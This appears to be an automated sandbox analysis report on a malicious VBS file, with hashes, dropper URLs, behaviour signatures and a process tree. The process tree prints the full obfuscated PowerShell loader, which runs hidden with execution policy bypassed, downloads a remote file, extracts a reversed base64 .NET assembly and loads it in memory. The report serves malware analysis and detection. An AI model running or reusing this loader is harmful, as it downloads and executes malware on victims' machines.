Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    14-11-2024 15:57

General

  • Target

    INQ02010391.vbs

  • Size

    137KB

  • MD5

    ed54f068782aaff84dce2776a3ffbd73

  • SHA1

    48a75d4b075131bf9abcfb3b77e64ace881f1b8e

  • SHA256

    64c7c1b70a135415a835bb48c638ca47db929b1df28bb62aaacd9cdcac76553b

  • SHA512

    9397d85e1e20b36736b6780fe7af5b3b5309ca2096368f3d99d3de3bbdfe348bb55854aef7a726ba55ac4210e19c2ab00bf82dae82a67354c50476217db90ba6

  • SSDEEP

    3072:SXs3fFf2ghaYlNAuaq/XDptbxILKDngt5pPGwm:SXSf4eJA0XDjbKG

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INQ02010391.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1776
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKMFFpbWFnZVVybCA9IEk5Ymh0dHBzOi8nKycvMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXJysnbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDJysnNlNRdCcrJ0ljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgSTliO0owUXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7SjBRaW1hZ2VCeScrJ3RlcyA9IEonKycwUXdlYkNsaWVudC5EJysnb3dubG9hZERhdGEoSjBRaW1hZ2VVcmwpO0owUWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEowUWltYScrJ2dlQnl0ZXMpO0owUXN0YScrJ3J0RmxhZyA9IEk5Yjw8QkFTRTYnKyc0X1MnKydUQVJUPj5JOWI7SjBRZW5kRmxhZyA9IEk5Yjw8QkFTRTY0X0VORD4+STliO0owUXN0YXJ0SW5kZXggPSBKMFEnKydpJysnbWFnZVRleHQuSW5kZXhPZihKMFFzdGFyJysndEZsYWcpOycrJ0owUWVuZEluZGV4ID0gSjBRaW1hZ2VUZXh0LkluZGV4T2YoSjBRZW5kRmxhZyk7SjBRc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIEowUWVuZEluZGV4IC1ndCBKMFFzdGFydEluZGV4O0owUXN0YXJ0SW5kZXgnKycgKz0gSjBRc3RhcnRGbGFnLkxlbmd0aDtKMFFiYXNlNjRMZW5ndGggPSBKMFFlbmRJbmRleCAtIEowUXN0YXJ0SW5kZXg7SjBRYicrJ2FzZTY0Q29tbWFuZCA9IEowUWltYWdlVGV4dC5TdWJzdHJpbmcnKycoSjBRc3RhcnRJbmRleCwgSjBRYmFzZTY0TGVuZ3RoKTtKMFFiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChKMFFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgRW04IEZvckVhY2gtT2JqZWN0IHsgSjBRXyB9KVstMS4uLShKMFFiYXNlNjRDb21tYW5kLkxlbmd0aCldO0owUWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoSjBRYmFzZTY0UmV2ZXJzZWQpO0owUWxvYScrJ2RlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChKMFFjb21tYW5kQnl0ZXMpO0owUXZhaU1ldGhvZCAnKyc9IFtkbicrJ2xpYi5JTy5Ib21lXS5HZXRNZXRob2QoSTliVkFJSTliKTtKMFF2YWlNZXRob2QuSW52b2tlKEowUW51bGwsIEAoSTlidHh0LmNlYS92ZWQuMnIuZDQzOGY3MScrJzU1Y2M2ZWVhOTJkMTRlNjA3NycrJzM3MjgxYzQtYnVwLy86c3B0dGhJOWIsIEk5YmRlc2F0aXZhZG9JOWIsIEk5YmRlc2F0aXZhZG9JOWIsIEk5YmRlc2F0aXZhZG9JOWIsIEk5Yk1TQnVpbGRJOWIsIEk5YmRlc2F0aXYnKydhZG9JOWIsIEk5YmRlc2F0aXZhZG9JOWIsSTliZGVzYXRpdmFkb0k5YixJOWJkZXNhdGl2YWRvSTliLEk5YmRlc2F0aXZhZG9JOWIsSTliZGVzYXRpdicrJ2Fkb0k5YixJOWJkZXNhdGl2YWRvSTliLEk5YjFJOWIsSTliZGVzYXRpdmFkb0k5YikpOycpLlJlUGxBQ2UoJ0owUScsW1N0UmlOZ11bY2hhcl0zNikuUmVQbEFDZSgnSTliJyxbU3RSaU5nXVtjaGFyXTM5KS5SZVBsQUNlKChbY2hhcl02OStbY2hhcl0xMDkrW2NoYXJdNTYpLFtTdFJpTmddW2NoYXJdMTI0KXxJRXg=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('J0QimageUrl = I9bhttps:/'+'/1017.filemail.com/api/file/get?filekey=2Aa_bW'+'o9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC'+'6SQt'+'IcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f I9b;J0QwebClient = New-Object System.Net.WebClient;J0QimageBy'+'tes = J'+'0QwebClient.D'+'ownloadData(J0QimageUrl);J0QimageText = [System.Text.Encoding]::UTF8.GetString(J0Qima'+'geBytes);J0Qsta'+'rtFlag = I9b<<BASE6'+'4_S'+'TART>>I9b;J0QendFlag = I9b<<BASE64_END>>I9b;J0QstartIndex = J0Q'+'i'+'mageText.IndexOf(J0Qstar'+'tFlag);'+'J0QendIndex = J0QimageText.IndexOf(J0QendFlag);J0QstartIndex -ge 0 -an'+'d J0QendIndex -gt J0QstartIndex;J0QstartIndex'+' += J0QstartFlag.Length;J0Qbase64Length = J0QendIndex - J0QstartIndex;J0Qb'+'ase64Command = J0QimageText.Substring'+'(J0QstartIndex, J0Qbase64Length);J0Qbase64Reversed = -join (J0Qbase64Command.ToCharArray() Em8 ForEach-Object { J0Q_ })[-1..-(J0Qbase64Command.Length)];J0QcommandBytes = [System.Convert]::FromBase64String(J0Qbase64Reversed);J0Qloa'+'dedAs'+'sembly = [System.Reflection.Assembly]::Load(J0QcommandBytes);J0QvaiMethod '+'= [dn'+'lib.IO.Home].GetMethod(I9bVAII9b);J0QvaiMethod.Invoke(J0Qnull, @(I9btxt.cea/ved.2r.d438f71'+'55cc6eea92d14e6077'+'37281c4-bup//:sptthI9b, I9bdesativadoI9b, I9bdesativadoI9b, I9bdesativadoI9b, I9bMSBuildI9b, I9bdesativ'+'adoI9b, I9bdesativadoI9b,I9bdesativadoI9b,I9bdesativadoI9b,I9bdesativadoI9b,I9bdesativ'+'adoI9b,I9bdesativadoI9b,I9b1I9b,I9bdesativadoI9b));').RePlACe('J0Q',[StRiNg][char]36).RePlACe('I9b',[StRiNg][char]39).RePlACe(([char]69+[char]109+[char]56),[StRiNg][char]124)|IEx"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1668

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    bc940bd93a8bf83d9f1544d4c3575e31

    SHA1

    e644fd2ebe7dba0ebb54af653d69559389955247

    SHA256

    a1539573641a04d6093d48b9fd2292920f268fb6173a3423cf10a406e667309d

    SHA512

    3cbe7116201dd67c4f11d98a7b6925555920f6b7ccb9a4a82480426762d80418e2d1e025c480cebe40e43e08071c34575d4ced7222b8c75451ceb7e05bb028dd

  • memory/2672-4-0x000007FEF5BEE000-0x000007FEF5BEF000-memory.dmp

    Filesize

    4KB

  • memory/2672-5-0x000000001B640000-0x000000001B922000-memory.dmp

    Filesize

    2.9MB

  • memory/2672-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

    Filesize

    32KB

  • memory/2672-12-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-13-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-14-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

    Filesize

    9.6MB